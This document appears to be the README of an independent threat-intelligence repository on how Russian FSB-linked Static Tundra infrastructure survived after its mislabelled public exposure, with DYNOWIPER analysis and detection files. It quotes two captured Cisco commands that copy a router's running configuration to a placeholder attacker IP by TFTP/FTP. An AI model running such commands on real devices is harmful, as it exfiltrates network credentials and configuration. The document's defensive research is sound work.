TLP:CLEAR · Defensive research · Independent CTI
Cisco Talos burned a Static Tundra IP on 2025‑02‑20. The actor kept using it for 133 more days.
The IP was published inside a report about Chinese Salt Typhoon, explicitly flagged "Smart Install Abuse not associated with Salt Typhoon", actor unknown. Six months later Talos named the cluster Static Tundra — Russian FSB Center 16.
By then the trade press had stripped the caveat and filed Russian FSB infrastructure under a Chinese headline. That mislabel is still the top Google result for the indicator, and it has propagated into VirusTotal collections.
2025-02-20 Talos publishes 185.141.24.28 (in a Salt Typhoon report, "not Salt Typhoon", actor unknown)
2025-02-21 Trade press: "Cisco further exposes Salt Typhoon..." <- caveat stripped
2025-07-03 185.141.24.28 finally goes dark <- 133 days later
2025-08-20 Talos names the cluster: Static Tundra / FSB Center 16 <- 181-day attribution lag
Assessment: the misattribution very likely reduced the operational cost of publication. An operator monitoring for exposure of their own infrastructure would be watching Russian-APT reporting. Their IP was burned inside a Chinese-APT blog, under a Chinese-APT headline, in a Chinese-APT feed.
| Path | Contents |
|---|---|
ANALYSIS.md |
ICD‑203 assessment — key judgments, alternatives, gaps, outlook |
TIMELINE.md |
The 133‑day survival, reconstructed from primary sources |
iocs/iocs.csv |
Indicators, tagged NOVEL / CORROBORATED / PUBLISHED |
iocs/excluded.csv |
Indicators we ruled out — and why. Read this one. |
detection/dynowiper.yar |
YARA — code‑anchored, not string‑anchored |
detection/dynowiper.sigma.yml |
Sigma — behavioural |
detection/hunting.md |
MDE KQL, scan‑engine queries, network logic |
reverse-engineering/DYNOWIPER.md |
Full static teardown |
| Finding | Confidence |
|---|---|
| All four published Static Tundra IPs originate from AS60117 (Host Sailor Ltd) — a provider neither Talos nor the FBI ever named | Almost certain (BGP) |
185.141.24.28 operated 133 days after public burn — no IOC‑rotation response |
Almost certain (dated, primary) |
| Feb‑2025 blog = first public appearance, 181 days pre‑attribution — the two reports are never cross‑referenced | Almost certain |
| Live trade‑press mislabel placing Russian FSB infrastructure under a Chinese‑MSS headline; propagated into VT collections | Almost certain |
| Zero infrastructure overlap between CERT Polska's five Dec‑2025 indicators and Static Tundra's four — 5 IPs, 5 ASNs, 5 countries, none AS60117 | Almost certain (arithmetic) |
| Finding | Confidence |
|---|---|
The program files(x86) exclusion is inoperative — the literal is 18 chars, the real Windows component is 19. Exact‑match comparison can never fire. The wiper destroyed 32‑bit application installs it was written to spare. |
Very likely |
Damage formula is min(blocks × 0.01, 4096) × 16 bytes — 1% of small files; a fixed 64 KB ceiling on large ones. Prior reporting said only "up to 4,096 offsets." |
Almost certain |
This sample carries no PDB path. The RSDS record is present with the filename field zeroed. Prior reporting attributes a C:\Users\vagrant\... path to this exact SHA‑256; that string is not in the file. |
Almost certain (byte‑verified) |
Rich header 328e56bfcf087b6de7810da157921400 and imphash 9956161cdbf58d343072c3eb29d186f0 — unpublished. Best available anchors for Version B. |
Almost certain |
No new atomic IOCs for Static Tundra infrastructure. That is a finding, not a gap.
Static Tundra's exfil staging is bare‑IP by design. Talos's own captured syntax proves it:
do show running-config | redirect tftp://<IP>/conf_bckp
copy running-config ftp://user:pass@<IP>/output.txt
No domains. No certificates. No DNS. Sixteen turns of hunting across Censys, Shodan, FOFA, Netlas, Silent Push (6‑year retention), Validin, VirusTotal, Hurricane Electric, RIPE and CT logs produced zero new indicators — and every candidate that surfaced belonged to somebody else.
That null is the evidence for the thesis. Every candidate that surfaced — an IIJ TLS decoy, a Microsoft Edge session misread as a beacon, zombie A records, a Russian bicycle shop, a Dutch phishing cluster, a 75,000-IP commodity JARM — dissolved once checked against two questions: when (dates against the activity window) and whose (who actually controls the artifact). Those exclusions are recorded in iocs/excluded.csv.
- Passive / air‑gapped. Scan‑engine review and static analysis only. No contact with operator infrastructure at any point.
- ICD‑203 estimative language on every judgment, with a rationale and a falsifying indicator.
- Interpretation pre‑registered before each pivot, so results were read honestly rather than fitted.
- Nulls logged as findings. Six hypotheses were raised and killed, including two of the author's own.
- Sample verified by hash, never by name.
- Primary sources only. Vendor claims re‑derived from the binary where checkable.
Static Tundra = FSB Center 16 is Talos's call at high confidence, FBI‑corroborated, and anchored to a 2022 DoJ indictment. This repo does not dispute it.
The December 2025 Polish campaign is contested and this repo does not resolve it.
| Source | Call | Basis |
|---|---|---|
| CERT Polska | Static Tundra (FSB) | infrastructure "overlap" |
| ESET | Sandworm links (GRU) | wiper use in the EU, energy targeting, BlackEnergy/GreyEnergy history |
| Dragos | possible Sandworm | — |
Our contribution is one arithmetic check: CERT Polska's five published indicators share no ASN, prefix, or provider with the only four Static Tundra IPs ever published. That does not disprove their attribution — they may hold non‑public data, and the operational roles differ (VPN sources vs. exfil drops). It does mean the overlap claim is not supported by anything public.
Capped at MODERATE. Single‑vendor attribution is not inherited as fact.
All primary, all fetched during analysis:
- Cisco Talos — Weathering the storm: In the midst of a Typhoon (2025‑02‑20)
- Cisco Talos — Russian state‑sponsored espionage group Static Tundra... (2025‑08‑20)
- CISA/NSA/FBI + 12 partners — AA26‑194A (2026‑07‑13)
- FBI IC3 PSA250820 (2025‑08‑20)
- Elastic Security Labs — DYNOWIPER (2026‑02‑06)
- CERT Polska — Energy Sector Incident Report, 29 December
- Hurricane Electric BGP, RIPE RDAP, Silent Push, VirusTotal, crt.sh, FOFA, Censys
Indicators in excluded.csv are published so that other analysts do not chase them. Several are third‑party victims or unrelated tenants. Do not treat anything in that file as adversary infrastructure.
Registrant names appearing in RIPE records for hosting providers are business contacts of record, not actor identities, and are deliberately omitted.
Confidence terminology per ICD‑203. Corrections welcome — open an issue.